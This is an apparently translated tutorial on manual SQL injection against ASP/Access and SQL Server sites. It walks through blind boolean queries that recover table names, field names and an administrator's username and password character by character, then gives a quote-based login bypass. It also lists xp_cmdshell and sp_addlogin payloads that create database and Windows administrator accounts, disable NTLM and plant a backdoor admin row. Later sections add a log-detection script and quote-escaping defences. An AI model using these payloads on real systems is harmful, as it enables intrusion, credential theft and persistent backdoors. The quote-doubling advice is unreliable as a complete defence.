ASP + Access Injection Basics

Source: Internet
Author: User
Tags: mdb, database
Example target: http://www.xxx.com/jiaren.asp?id=544
OK, let's start.

1. Determining whether the parameter is injectable

Use a single quote: '
Use and 1=1 and and 1=2

This determination step is the most important one: if you do not know how to judge the responses, you cannot continue with manual injection.
Submitting ' returns:

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'id = 544'.

/jiaren.asp, line 15

Submitting ; returns the normal page.

Submitting and 1=1 returns the normal page.

Submitting and 1=2 returns the error page:

ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/jiaren.asp, line 28

The simple tests above tell us that the page is injectable. Many people ask at this point how we know there is an injection: remember that we judge by the difference between the returned pages. Only when the two responses differ can we tell that the injection exists.

2. Guess the table name
and 0<>(select count(*) from *)
This is the most basic query statement. I will explain what it does, but for details please refer to SQL reference material.

and 0<>(select count(*) from Admin) --- determines whether the Admin table exists

Here only Admin is changed; do not change the other parts.
If the normal page is returned, the Admin table exists. If the error page is returned, the table does not exist and we change the name to another one, for example and 0<>(select count(*) from user). You can try any name you can think of. I gave two tips in class that day and did not expect many people to know them; people also asked whether Admin and user could be replaced with something else. Yes, the name can be replaced, but since you are guessing a table name you still need to think about it: would changing it to 123 or 456 help? No, because nobody uses such a table name.
Generally the table name is something like admin, adminuser, user, pass, password...

3. Guess the number of accounts
and 0<(select count(*) from Admin)
This is similar to the previous statement; in fact the query part is identical. The difference is the number in front, which is used to check how many user accounts there are. The number is not fixed at 1, because we are guessing: we do not know how many accounts the table holds, so we have to guess. If it were fixed, there would be nothing to guess.
1< means: check whether 1 is less than the number of accounts. If the normal page is returned, the condition holds; if the error page is returned, it does not, and we replace it with 2<, 3<, and so on. You can also guess from the other side with 1>, 2>, and so on.
If 0< returns the normal page and 1< returns the error page, the account count follows from simple arithmetic; I will not explain how to narrow down a number.
Here I start from 0, which is certain to return the normal page because there cannot be zero administrator accounts. 1< returns the error page, so there is only one administrator account. Change it to 1= to confirm: the normal page means yes.
If there are several accounts, you need to know which account you are guessing.

4. Guess the field names
and 1=(select count(*) from Admin where Len(name)>0)    user-name field
and 1=(select count(*) from Admin where Len(password)>0)    password field

This guesses the names of the fields in the table.
and 1=(select count(*) from Admin where Len(*)>0) --- this is the core statement; all we do is put the field name we think of inside the Len() brackets.

Let's first guess the user-name field. I used name and the normal page came back, so now we guess the password field.
I first tried pass, which failed, so I switched to password and the normal page came back.
So we have guessed the user field and the password field. Next we guess the length and the specific characters.

5. Guess the length of each field
To guess the length:
and 1=(select count(*) from Admin where Len(*)>0)

Replace the 0 after > with other numbers; if the normal page comes back, the condition holds. Let's get started.
First the account length; the account field is name.
and 1=(select count(*) from Admin where Len(name)>0)    normal
and 1=(select count(*) from Admin where Len(name)>1)    normal
and 1=(select count(*) from Admin where Len(name)>2)    normal
and 1=(select count(*) from Admin where Len(name)>6)    error
and 1=(select count(*) from Admin where Len(name)>5)    normal
and 1=(select count(*) from Admin where Len(name)>4)    normal
So the length is 6.
and 1=(select count(*) from Admin where Len(name)=6)    normal
Right: =6 returns the normal page.

Below is the length of the password field:
and 1=(select count(*) from Admin where Len(password)>0)    normal
and 1=(select count(*) from Admin where Len(password)>6)    normal
and 1=(select count(*) from Admin where Len(password)>10)    normal
and 1=(select count(*) from Admin where Len(password)>15)    error
and 1=(select count(*) from Admin where Len(password)>14)    error
and 1=(select count(*) from Admin where Len(password)>13)    error
and 1=(select count(*) from Admin where Len(password)>12)    error
and 1=(select count(*) from Admin where Len(password)>11)    normal
OK, the length is 12.

Name 6
Password 12

The specific characters are guessed next.

6. Guess the characters
and 1=(select count(*) from Admin where left(name,1)='A') --- guess the user name
and 1=(select count(*) from Admin where left(password,1)='A') --- guess the password
Guess one more character each time until you reach the length found above; then the account has come out.

left(name,1)='A': note that the 1 is the position of the characters being guessed.
and 1=(select count(*) from Admin where left(name,1)='A') --- first character of the account
and 1=(select count(*) from Admin where left(name,2)='AB') --- first two characters of the account
Continue like this.

and 1=(select count(*) from Admin where left(name,1)='A')    error
.....
and 1=(select count(*) from Admin where left(name,6)='pclzyq')
Because this guessing process is long, I give the answer directly.

and 1=(select count(*) from Admin where left(password,1)='A')    error
.......
and 1=(select count(*) from Admin where left(password,12)='pclzyq000215')
The answer is given directly.

Name = pclzyq
Password = pclzyq000215

7. Find the login page and log in
Common login pages:
admin.asp
admin_index.asp
admin/index.asp
admin/admin.asp
....
You can collect more yourself. Don't forget to put them in a text file and send it to me.

Here the login page is http://www.xxx.com/admin.asp.

Now let's look at the back-end program. This login page probably has another problem: try logging in with ' or ''=' and see; if it works, you are in.
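As an added, defender-side example (not part of the original tutorial), this Python script runs one detection rule per probing step described above over constructed IIS-style log lines; the sample log, the rule names and the IP addresses are all made up here.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (client IP, method, request, status);
# the query strings follow the probes shown in steps 1 to 6.
SAMPLE_LOG = """\
203.0.113.5 GET /jiaren.asp?id=544 200
203.0.113.5 GET /jiaren.asp?id=544' 500
203.0.113.5 GET /jiaren.asp?id=544%20and%201=1 200
203.0.113.5 GET /jiaren.asp?id=544%20and%201=2 500
203.0.113.5 GET /jiaren.asp?id=544%20and%200<>(select%20count(*)%20from%20Admin) 200
203.0.113.5 GET /jiaren.asp?id=544%20and%201=(select%20count(*)%20from%20Admin%20where%20Len(name)>5) 200
203.0.113.5 GET /jiaren.asp?id=544%20and%201=(select%20count(*)%20from%20Admin%20where%20left(name,1)='p') 200
198.51.100.7 GET /jiaren.asp?id=545 200
"""

# One rule per step of the manual procedure, applied to the URL-decoded,
# lower-cased query string.
RULES = {
    "quote_probe": re.compile(r"=[^&]*'$"),
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "table_enum": re.compile(r"select\s+count\(\*\)\s+from\s+\w+"),
    "length_inference": re.compile(r"\blen\s*\(\s*\w+\s*\)\s*[<>=]"),
    "char_inference": re.compile(r"\b(left|mid|asc)\s*\("),
    "stacked_exec": re.compile(r";\s*exec\b"),
}

def classify(request_path):
    """Return the names of the rules matching one request's query string."""
    _, _, query = request_path.partition("?")
    decoded = unquote_plus(query).lower()
    return {name for name, rx in RULES.items() if rx.search(decoded)}

def analyze(log_text):
    """Per client IP: rules matched, number of flagged requests, and the set of
    HTTP status codes they produced (the normal/error flip the tutorial relies on)."""
    report = defaultdict(lambda: {"rules": set(), "statuses": set(), "hits": 0})
    for line in log_text.splitlines():
        ip, _method, path, status = line.split()
        hits = classify(path)
        if hits:
            report[ip]["rules"] |= hits
            report[ip]["statuses"].add(status)
            report[ip]["hits"] += 1
    return dict(report)
```

A single client alternating between the normal and the error status while matching several rules in sequence is the signature of the manual procedure above, which a per-request signature alone would not show.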

Note:

Command: select
Meaning: select
Description: used to find records that meet the condition

Aggregate function: Count
Meaning: count
Description: used to count the specified quantity

Clause: From
Meaning: data table
Description: used to specify a data table

Clause: Where
Meaning: condition
Description: used to set conditions

Operator: and
Meaning: and
Description: logical AND

Top -- extracts the first rows, up to the specified number
select top 10 * from .....

and 1=(select top 1 count(*) from Admin where asc(mid(pass,5,1))=51) -- this statement can be used to guess Chinese user names and passwords: replace the number at the end with the character code, and finally convert the result back to a character.
----------------------------------------------------- Note
Creating a database administrator account and a system administrator account through a SQL Server injection point [the current account must be in the sysadmin group]:
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- // add the database login test with the password test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- // to change the password, use this statement (changes the password of test to 123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- // add test to the sysadmin role; members of this role can perform any operation
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test /add';-- // add the system user test with the password test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- // promote the system user test to administrator
In this way you leave a test administrator account in both the database and the system.
2:
Replace(variable, "'", "''") turns a single quote into two single quotes.
For example, statements that can be injected:
Pwd = Request.Form("PWD")
Name = Request.Form("name")
After modification there is no way to inject:
Pwd = Request.Form("PWD")
Name = Request.Form("name")
Name = Replace(Name, "'", "''")
Read the value first, then check it.
Or directly:
Pwd = Replace(Request.Form("PWD"), "'", "''")
Name = Replace(Request.Form("name"), "'", "''")
Third example:
SQL = "select * from table where user='" & user & "' and pass='" & pass & "'"
SQL = "select * from table where user='" & Replace(user, "'", "''") & "' and pass='" & Replace(pass, "'", "''") & "'"
---------------------
For an ordinary inline statement:
Replace(string, "'", "''")
For a stored procedure:
Replace(string, "'", "''''")
For numeric types: IsNumeric
--------------------------------------------
Against SQL injection, many sites now filter with Replace(Request("ID"), "'", "''"), turning a single quote into two single quotes; some also use Replace(Request("ID"), " ", "") to remove all spaces.
For a query written as select * from tablename where id='" & Replace(Request("ID"), ...), there is currently no way to break this filter.
However, many sites write select * from tablename where id=" & Replace(Request("ID"), ...), where the submitted parameter is not enclosed in single quotes, yet they rely on quote filtering alone to protect the user data from SQL injection. This defense makes ordinary SQL injection fail, a half-defended state, but if the attacker never needs to open a single quote, that defense is meaningless. The same applies to space filtering.

Mainly used when passing numeric variables:
id = Request.QueryString("ID")    ' get the passed ID
If Not IsNumeric(id) Then         ' validate: if the ID is not numeric, then...
    Response.Write "Invalid address ~"
    Response.End
End If
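Added example (not the page's own code) modelling the argument above in Python: quote doubling keeps injected text inside a string literal, but does nothing for an unquoted numeric parameter, which is why the strict numeric check is needed. The templates and values are constructed, and the literal scanner is a simplified model of how the engine tokenizes the statement.

```python
import re

# Constructed sample values (not from the page): a normal id and the kind of
# boolean probe the tutorial appends to it.
BENIGN_ID = "544"
PROBE_ID = "544 and 1=2"

# The two query shapes the page contrasts: a quoted string column and an
# unquoted numeric column, both built by string concatenation.
QUOTED_TEMPLATE = "select * from tablename where name='{}'"
NUMERIC_TEMPLATE = "select * from tablename where id={}"

# Keywords absent from both templates: one found outside a literal means input changed the statement.
INJECTED_KEYWORDS = ("and", "or", "union", "exec", "insert")

def escape_quotes(value):
    """The page's Replace(Request("ID"), "'", "''") filter."""
    return value.replace("'", "''")

def is_integer(value):
    """Strict check for an unquoted numeric parameter (the IsNumeric idea)."""
    return re.fullmatch(r"[0-9]+", value) is not None

def outside_literals(sql):
    """Return the SQL text with single-quoted literals blanked out.
    A doubled quote inside a literal is an escaped quote, not a terminator,
    so whatever escape_quotes() kept inside the literal disappears here."""
    out, i, in_literal = [], 0, False
    while i < len(sql):
        ch = sql[i]
        if in_literal:
            if ch == "'" and sql[i + 1:i + 2] == "'":
                i += 2                      # escaped quote: stay in literal
                continue
            if ch == "'":
                in_literal = False
        elif ch == "'":
            in_literal = True
        else:
            out.append(ch)
        i += 1
    return "".join(out).lower()

def predicate_survives(template, value, filt=lambda v: v):
    """True if injected keywords reach the parser outside any string literal."""
    sql = template.format(filt(value))
    text = outside_literals(sql)
    return any(re.search(r"\b%s\b" % kw, text) for kw in INJECTED_KEYWORDS)
```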

Supplement: display the directory through an Access injection point
Because sometimes we need to know which disk the website is on; this only works for mdb databases.
http://www.252525.net/news.asp?id=1 and (select top 1 tmp from temp)=1
Supplement: remove NTLM authentication
Run the command directly: tlntadmn config sec=-NTLM
Through the injection: ;exec master.dbo.xp_cmdshell 'tlntadmn config sec=-NTLM' --
Add an administrator to the database:
;insert into admin (username, passwd, oskey) values ('ldwz', '49ba59abbe56e057', 'super') --
